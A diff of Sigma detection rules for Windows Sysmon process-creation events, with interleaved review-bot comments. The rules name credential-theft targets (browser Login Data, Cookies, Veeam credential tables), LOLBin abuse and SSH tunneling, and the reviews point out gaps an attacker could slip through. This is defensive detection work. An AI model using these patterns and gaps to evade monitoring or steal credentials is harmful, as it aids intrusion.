@@ -1,8 +1,7 @@ title: Schtasks Creation Or Modification With SYSTEM Privileges id: 89ca78fd-b37c-4310-b3d3-81a023f83936 status: experimental -description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" - privileges +description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges references: - https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks @@ -23,22 +22,27 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_root: Image|endswith: \schtasks.exe - CommandLine|contains: + CommandLine|contains: - ' /change ' - ' /create ' selection_run: - CommandLine|contains: '/ru ' + CommandLine|contains: '/ru ' selection_user: - CommandLine|contains: - - NT AUT - - ' SYSTEM ' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space filter_optional_teamviewer: + # FP from test set in SIGMA + # Cannot use ParentImage on all OSes for 4688 events + # ParentImage|contains|all: + # - '\AppData\Local\Temp\' + # - 'TeamViewer_.exe' Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - /TN TVInstallRestore - \TeamViewer_.exe filter_optional_avira: - CommandLine|contains: + CommandLine|contains: - '/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR ' - :\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe - /VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART" /RL HIGHEST diff --git a/sigma/sysmon/process_creation/proc_creation_win_sdbinst_shim_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_sdbinst_shim_persistence.yml index ad531f329..2d688e3bc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sdbinst_shim_persistence.yml 
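Review bot: `selection_user` requires `' SYSTEM '` with a trailing space, so the common form where the account is the final token (`... /sc onstart /ru SYSTEM`) is not detected by this rule at all. Either drop the trailing space, as the two schedule-type rules in this commit do, or add a second map to the selection with `CommandLine|endswith: ' system'`. The new comment "Cannot use ParentImage on all OSes for 4688 events" was carried over from the generic rule and does not apply here, where the source is `Channel: Microsoft-Windows-Sysmon/Operational` / `EventID: 1` and ParentImage is populated; in this variant the commented-out `ParentImage|contains|all` lines can simply be enabled, which would make the TeamViewer exclusion more than a `contains|all` on two spoofable command-line strings. The `detection:` block starts before this hunk.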
+++ b/sigma/sysmon/process_creation/proc_creation_win_sdbinst_shim_persistence.yml @@ -1,15 +1,12 @@ title: Potential Shim Database Persistence via Sdbinst.EXE id: 517490a7-115a-48c6-8862-1a481504d5a8 related: - - id: 18ee686c-38a3-4f65-9f44-48a077141f42 - type: similar + - id: 18ee686c-38a3-4f65-9f44-48a077141f42 + type: similar status: test -description: 'Detects installation of a new shim using sdbinst.exe. - - Adversaries may establish persistence and/or elevate privileges by executing malicious - content triggered by application shims - - ' +description: | + Detects installation of a new shim using sdbinst.exe. + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims references: - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence author: Markus Neis @@ -28,13 +25,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \sdbinst.exe - - OriginalFileName: sdbinst.exe + - Image|endswith: \sdbinst.exe + - OriginalFileName: sdbinst.exe selection_cli: - CommandLine|contains: .sdb + CommandLine|contains: .sdb filter_optional_iis: ParentImage|endswith: \msiexec.exe - CommandLine|contains: + CommandLine|contains: + # Expected behavior for IIS Express (e.g. https://www.hybrid-analysis.com/sample/15d4ff941f77f7bdfc9dfb2399b7b952a0a2c860976ef3e835998ff4796e5e91?environmentId=120) - :\Program Files (x86)\IIS Express\iisexpressshim.sdb - :\Program Files\IIS Express\iisexpressshim.sdb condition: process_creation and (all of selection_* and not 1 of filter_optional_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sdbinst_susp_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_sdbinst_susp_extension.yml index 5f160f348..a85920ea5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sdbinst_susp_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sdbinst_susp_extension.yml 
@@ -1,16 +1,12 @@ title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE id: 18ee686c-38a3-4f65-9f44-48a077141f42 related: - - id: 517490a7-115a-48c6-8862-1a481504d5a8 - type: derived + - id: 517490a7-115a-48c6-8862-1a481504d5a8 + type: derived status: test -description: 'Detects installation of a potentially suspicious new shim with an uncommon - extension using sdbinst.exe. - - Adversaries may establish persistence and/or elevate privileges by executing malicious - content triggered by application shims - - ' +description: | + Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims references: - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md @@ -30,21 +26,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \sdbinst.exe - - OriginalFileName: sdbinst.exe + - Image|endswith: \sdbinst.exe + - OriginalFileName: sdbinst.exe filter_main_legit_ext: - CommandLine|contains: .sdb + CommandLine|contains: .sdb filter_main_svchost: - - CommandLine|endswith: - - ' -c' - - ' -f' - - ' -mm' - - ' -t' - - CommandLine|contains: ' -m -bg' + # ParentImage|endswith: ':\Windows\System32\svchost.exe' + - CommandLine|endswith: + - ' -c' + - ' -f' + - ' -mm' + - ' -t' + - CommandLine|contains: ' -m -bg' filter_main_null: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown 
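Review bot: With `# ParentImage|endswith: ':\Windows\System32\svchost.exe'` left commented out, `filter_main_svchost` exempts any `sdbinst.exe` whose command line ends in ` -c`, ` -f`, ` -mm` or ` -t` (or contains ` -m -bg`) regardless of who launched it, so a non-`.sdb` shim install that carries such a trailing flag is whitelisted; whether sdbinst tolerates an extra trailing switch in that position I cannot confirm from here, but the filter does not depend on it. This is the Sysmon variant, where ParentImage is always present, so enabling that constraint costs nothing and restores the intent the comment documents. Changing `CommandLine: null` to a bare `CommandLine:` is YAML-equivalent and fine. The `detection:` block starts before this hunk.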
diff --git a/sigma/sysmon/process_creation/proc_creation_win_sdclt_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_sdclt_child_process.yml index 9950b25f5..25c6ed130 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sdclt_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sdclt_child_process.yml @@ -1,8 +1,7 @@ title: Sdclt Child Processes id: da2738f2-fadb-4394-afa7-0a0674885afa status: test -description: A General detection for sdclt spawning new processes. This could be an - indicator of sdclt being used for bypass UAC techniques. +description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/6 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md diff --git a/sigma/sysmon/process_creation/proc_creation_win_sdiagnhost_susp_child.yml b/sigma/sysmon/process_creation/proc_creation_win_sdiagnhost_susp_child.yml index 45939b9f2..f0860298d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sdiagnhost_susp_child.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sdiagnhost_susp_child.yml @@ -1,8 +1,7 @@ title: Sdiagnhost Calling Suspicious Child Process id: f3d39c45-de1a-4486-a687-ab126124f744 status: test -description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used - in exploits for Follina / CVE-2022-30190) +description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ 
@@ -26,6 +25,7 @@ detection: selection: ParentImage|endswith: \sdiagnhost.exe Image|endswith: + # Add more suspicious LOLBins - \powershell.exe - \pwsh.exe - \cmd.exe @@ -35,7 +35,8 @@ detection: - \taskkill.exe - \regsvr32.exe - \rundll32.exe - - \calc.exe + # - '\csc.exe' # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/ + - \calc.exe # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_secedit_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_secedit_execution.yml index 09392e2cb..35bd63ee6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_secedit_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_secedit_execution.yml @@ -1,8 +1,7 @@ title: Potential Suspicious Activity Using SeCEdit id: c2c76b77-32be-4d1f-82c9-7e544bdfe0eb status: test -description: Detects potential suspicious behaviour using secedit.exe. Such as exporting - or modifying the security policy +description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy references: - https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit 
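Review bot: The newly commented-out `# - '\csc.exe'` carries only a sandbox link and no reason, so the next maintainer has no way to tell whether it was removed as a false positive or parked as a to-do. I would state the reason on the line, hedged if it is not confirmed, e.g. `# - '\csc.exe' # excluded: presumed benign compile from the troubleshooter's own PowerShell (verify) – see any.run link`. The `selection:` block starts before the first hunk of this file.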
@@ -38,16 +37,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \secedit.exe - - OriginalFileName: SeCEdit + - Image|endswith: \secedit.exe + - OriginalFileName: SeCEdit selection_flags_discovery: - CommandLine|contains|all: + CommandLine|contains|all: - /export - /cfg selection_flags_configure: - CommandLine|contains|all: + CommandLine|contains|all: - /configure - /db + # filter: + # SubjectUserName|endswith: '$' SubjectUserName is from event ID 4719 in the Windows Security log condition: process_creation and (selection_img and (1 of selection_flags_*)) falsepositives: - Legitimate administrative use diff --git a/sigma/sysmon/process_creation/proc_creation_win_servu_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_servu_susp_child_process.yml index fd3029a39..6f99c70be 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_servu_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_servu_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Serv-U Process Pattern id: 58f4ea09-0fc2-4520-ba18-b85c540b0eaf status: test -description: Detects a suspicious process pattern which could be a sign of an exploited - Serv-U service +description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ author: Florian Roth (Nextron Systems) @@ -32,7 +31,7 @@ detection: - \bash.exe - \schtasks.exe - \regsvr32.exe - - \wmic.exe + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \mshta.exe - \rundll32.exe - \msiexec.exe 
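Review bot: The commented-out filter `SubjectUserName|endswith: '$'` and its note "SubjectUserName is from event ID 4719 in the Windows Security log" do not fit this rule, whose source is `EventID: 1` on `Channel: Microsoft-Windows-Sysmon/Operational` where no such field exists; a reader enabling it would get a filter that never matches and silently keeps every machine-account hit. If the intent is to drop computer-account executions, the equivalent here is `User|endswith: '$'`, and the comment should say which event and field it refers to. The `detection:` block starts before this hunk.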
@@ -40,7 +39,6 @@ detection: - \scriptrunner.exe condition: process_creation and selection falsepositives: - - Legitimate uses in which users or programs use the SSH service of Serv-U for - remote command execution + - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_setspn_spn_enumeration.yml b/sigma/sysmon/process_creation/proc_creation_win_setspn_spn_enumeration.yml index 571bfbfdc..b6c408ae4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_setspn_spn_enumeration.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_setspn_spn_enumeration.yml @@ -20,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_pe: - - Image|endswith: \setspn.exe - - OriginalFileName: setspn.exe - - Description|contains|all: - - Query or reset the computer - - SPN attribute + - Image|endswith: \setspn.exe + - OriginalFileName: setspn.exe + - Description|contains|all: + - Query or reset the computer + - SPN attribute selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -q ' - ' /q ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_shutdown_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_shutdown_execution.yml index c02c6fed6..f596a2654 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_shutdown_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_shutdown_execution.yml @@ -20,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \shutdown.exe - CommandLine|contains: + CommandLine|contains: - '/r ' - '/s ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_shutdown_logoff.yml b/sigma/sysmon/process_creation/proc_creation_win_shutdown_logoff.yml index ef29e95d8..824dc9fb4 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_shutdown_logoff.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_shutdown_logoff.yml
@@ -20,7 +20,7 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection:
Image|endswith: \shutdown.exe
- CommandLine|contains: /l
+ CommandLine|contains: /l
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_sndvol_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_sndvol_susp_child_processes.yml
index c3bbb2550..945da3adf 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_sndvol_susp_child_processes.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_sndvol_susp_child_processes.yml
@@ -1,8 +1,7 @@
title: Uncommon Child Processes Of SndVol.exe
id: ba42babc-0666-4393-a4f7-ceaf5a69191e
status: experimental
-description: Detects potentially uncommon child processes of SndVol.exe (the Windows
- volume mixer)
+description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
references:
- https://twitter.com/Max_Mal_/status/1661322732456353792
author: X__Junior (Nextron Systems)
@@ -21,7 +20,7 @@ detection:
ParentImage|endswith: \SndVol.exe
filter_main_rundll32:
Image|endswith: \rundll32.exe
- CommandLine|contains: ' shell32.dll,Control_RunDLL '
+ CommandLine|contains: ' shell32.dll,Control_RunDLL '
condition: process_creation and (selection and not 1 of filter_main_*)
falsepositives:
- Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_soundrecorder_audio_capture.yml b/sigma/sysmon/process_creation/proc_creation_win_soundrecorder_audio_capture.yml
index d2a2832cc..b0240438f 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_soundrecorder_audio_capture.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_soundrecorder_audio_capture.yml
@@ -21,7 +21,7 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection:
Image|endswith: \SoundRecorder.exe
- CommandLine|contains: /FILE
+ CommandLine|contains: /FILE
condition: process_creation and selection
falsepositives:
- Legitimate audio capture by legitimate user.
diff --git a/sigma/sysmon/process_creation/proc_creation_win_splwow64_cli_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_splwow64_cli_anomaly.yml
index 3b9bf97f9..4446bd385 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_splwow64_cli_anomaly.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_splwow64_cli_anomaly.yml
@@ -20,7 +20,7 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection:
Image|endswith: \splwow64.exe
- CommandLine|endswith: splwow64.exe
+ CommandLine|endswith: splwow64.exe
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml
index f97316ed8..2712fd8a3 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml
@@ -53,18 +53,18 @@ detection:
- \net.exe
- \net1.exe
suspicious_net_filter:
- CommandLine|contains: start
+ CommandLine|contains: start
suspicious_cmd:
Image|endswith: \cmd.exe
suspicious_cmd_filter:
- CommandLine|contains:
+ CommandLine|contains:
- .spl
- route add
- program files
suspicious_netsh:
Image|endswith: \netsh.exe
suspicious_netsh_filter:
- CommandLine|contains:
+ CommandLine|contains:
- add portopening
- rule name
suspicious_powershell:
@@ -72,16 +72,13 @@ detection: - \powershell.exe - \pwsh.exe suspicious_powershell_filter: - CommandLine|contains: .spl + CommandLine|contains: .spl suspicious_rundll32_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE suspicious_rundll32_cli: - CommandLine|endswith: rundll32.exe - condition: process_creation and (spoolsv and ( suspicious_unrestricted or (suspicious_net - and not suspicious_net_filter) or (suspicious_cmd and not suspicious_cmd_filter) - or (suspicious_netsh and not suspicious_netsh_filter) or (suspicious_powershell - and not suspicious_powershell_filter) or all of suspicious_rundll32_* )) + CommandLine|endswith: rundll32.exe + condition: process_creation and (spoolsv and ( suspicious_unrestricted or (suspicious_net and not suspicious_net_filter) or (suspicious_cmd and not suspicious_cmd_filter) or (suspicious_netsh and not suspicious_netsh_filter) or (suspicious_powershell and not suspicious_powershell_filter) or all of suspicious_rundll32_* )) fields: - Image - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml index cd3406c13..3c079a117 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml @@ -1,8 +1,7 @@ title: Veeam Backup Database Suspicious Query id: 696bfb54-227e-4602-ac5b-30d9d2053312 status: experimental -description: Detects potentially suspicious SQL queries using SQLCmd targeting the - Veeam backup databases in order to steal information. +description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) 
@@ -20,11 +19,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_sql: Image|endswith: \sqlcmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - VeeamBackup - 'From ' selection_db: - CommandLine|contains: + CommandLine|contains: - BackupRepositories - Backups - Credentials diff --git a/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml b/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml index fd7bfdfc4..cff217f7e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml @@ -22,7 +22,7 @@ detection: selection_tools: Image|endswith: \sqlcmd.exe selection_query: - CommandLine|contains|all: + CommandLine|contains|all: - SELECT - TOP - '[VeeamBackup].[dbo].[Credentials]' diff --git a/sigma/sysmon/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml b/sigma/sysmon/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml index f99ec520a..b82bc3d16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml @@ -1,8 +1,7 @@ title: SQLite Chromium Profile Data DB Access id: 24c77512-782b-448a-8950-eddb0785fc71 status: test -description: Detect usage of the "sqlite" binary to query databases in Chromium-based - browsers for potential data stealing. +description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. references: - https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ 
@@ -24,20 +23,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sql: - - Product: SQLite - - Image|endswith: - - \sqlite.exe - - \sqlite3.exe + - Product: SQLite + - Image|endswith: + - \sqlite.exe + - \sqlite3.exe selection_chromium: - CommandLine|contains: - - \User Data\ - - \Opera Software\ - - \ChromiumViewer\ + CommandLine|contains: + - \User Data\ # Most common folder for user profile data among Chromium browsers + - \Opera Software\ # Opera + - \ChromiumViewer\ # Sleipnir (Fenrir) selection_data: - CommandLine|contains: - - Login Data + CommandLine|contains: + - Login Data # Passwords - Cookies - - Web Data + - Web Data # Credit cards, autofill data - History - Bookmarks condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml b/sigma/sysmon/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml index 2a18d4db7..da3ad9457 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml @@ -1,8 +1,7 @@ title: SQLite Firefox Profile Data DB Access id: 4833155a-4053-4c9c-a997-777fcea0baa7 status: test -description: Detect usage of the "sqlite" binary to query databases in Firefox and - other Gecko-based browsers for potential data stealing. +description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ 
@@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sql: - - Product: SQLite - - Image|endswith: - - \sqlite.exe - - \sqlite3.exe + - Product: SQLite + - Image|endswith: + - \sqlite.exe + - \sqlite3.exe selection_firefox: - CommandLine|contains: + CommandLine|contains: - cookies.sqlite - - places.sqlite + - places.sqlite # Bookmarks, history condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_squirrel_download.yml b/sigma/sysmon/process_creation/proc_creation_win_squirrel_download.yml index 46d409e36..800e5af24 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_squirrel_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_squirrel_download.yml 
@@ -1,22 +1,18 @@ title: Arbitrary File Download Via Squirrel.EXE id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c related: - - id: 45239e6a-b035-4aaf-b339-8ad379fcb67e - type: similar - - id: fa4b21c9-0057-4493-b289-2556416ae4d7 - type: obsoletes + - id: 45239e6a-b035-4aaf-b339-8ad379fcb67e + type: similar + - id: fa4b21c9-0057-4493-b289-2556416ae4d7 + type: obsoletes status: experimental -description: 'Detects the usage of the "Squirrel.exe" to download arbitrary files. - This binary is part of multiple Electron based software installations (Slack, - Teams, Discord, etc.) - - ' +description: | + Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ -author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan - Ribeiro, oscd.community +author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2022/06/09 modified: 2023/11/09 tags: @@ -36,15 +32,14 @@ detection: - \squirrel.exe - \update.exe selection_download_cli: - CommandLine|contains: + CommandLine|contains: - ' --download ' - ' --update ' - ' --updateRollback=' selection_download_http_keyword: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - - Expected FP with some Electron based applications such as (1Clipboard, Beaker - Browser, Caret, Discord, GitHub Desktop, etc.) + - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) level: medium ruletype: Sigma 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_squirrel_proxy_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_squirrel_proxy_execution.yml index 34b99752f..9e6eac82c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_squirrel_proxy_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_squirrel_proxy_execution.yml @@ -1,22 +1,18 @@ title: Process Proxy Execution Via Squirrel.EXE id: 45239e6a-b035-4aaf-b339-8ad379fcb67e related: - - id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c - type: similar - - id: fa4b21c9-0057-4493-b289-2556416ae4d7 - type: obsoletes + - id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c + type: similar + - id: fa4b21c9-0057-4493-b289-2556416ae4d7 + type: obsoletes status: experimental -description: 'Detects the usage of the "Squirrel.exe" binary to execute arbitrary - processes. This binary is part of multiple Electron based software installations - (Slack, Teams, Discord, etc.) - - ' +description: | + Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ -author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan - Ribeiro, oscd.community +author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2022/06/09 modified: 2023/11/09 tags: 
@@ -36,43 +32,42 @@ detection: - \squirrel.exe - \update.exe selection_exec: - CommandLine|contains: + CommandLine|contains: - --processStart - --processStartAndWait - --createShortcut filter_optional_discord: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\Discord\Update.exe - ' --processStart' - Discord.exe filter_optional_github_desktop: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\GitHubDesktop\Update.exe - GitHubDesktop.exe - CommandLine|contains: + CommandLine|contains: - --createShortcut - --processStartAndWait filter_optional_teams: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\Microsoft\Teams\Update.exe - Teams.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut filter_optional_yammer: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\yammerdesktop\Update.exe - Yammer.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - - Expected FP with some Electron based applications such as (1Clipboard, Beaker - Browser, Caret, Discord, GitHub Desktop, etc.) + - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_ssh_port_forward.yml b/sigma/sysmon/process_creation/proc_creation_win_ssh_port_forward.yml index 03246c088..6585698ba 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ssh_port_forward.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ssh_port_forward.yml 
@@ -23,7 +23,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \ssh.exe - CommandLine|contains: + CommandLine|contains: - ' -R ' - ' /R ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_ssh_rdp_tunneling.yml b/sigma/sysmon/process_creation/proc_creation_win_ssh_rdp_tunneling.yml index 03ee8b48b..739fb85f3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ssh_rdp_tunneling.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ssh_rdp_tunneling.yml @@ -1,11 +1,10 @@ title: Potential RDP Tunneling Via SSH id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d related: - - id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da - type: similar + - id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da # plink.exe + type: similar status: test -description: Execution of ssh.exe to perform data exfiltration and tunneling through - RDP +description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems) @@ -24,7 +23,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \ssh.exe - CommandLine|contains: :3389 + CommandLine|contains: :3389 condition: process_creation and selection falsepositives: - Administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_ssm_agent_abuse.yml 